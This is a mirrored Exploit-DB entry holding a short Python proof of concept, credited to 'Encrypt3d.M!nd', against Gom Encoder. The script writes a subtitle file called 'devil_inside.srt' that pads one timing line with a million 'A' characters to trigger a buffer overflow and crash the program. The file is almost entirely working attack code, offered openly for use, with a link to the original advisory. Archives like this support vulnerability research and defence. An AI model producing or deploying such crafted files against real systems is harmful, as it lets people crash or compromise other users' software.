exploit-db-mirror/exploits/windows/dos/8225.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

16 lines
No EOL
313 B
Python
Executable file

#exploit.py
#
# Gom Encoder (Subtitle File) Buffer Overflow PoC
# by :Encrypt3d.M!nd
#
# Orignal Advisory:
# https://www.securityfocus.com/bid/34120
#
chars = 'A' * 1000000
file = open ( 'devil_inside.srt', 'w' )
file.write ('1\n00:00:00,001 --> 00:00:06,000\n'+chars)
file.close()
# milw0rm.com [2009-03-16]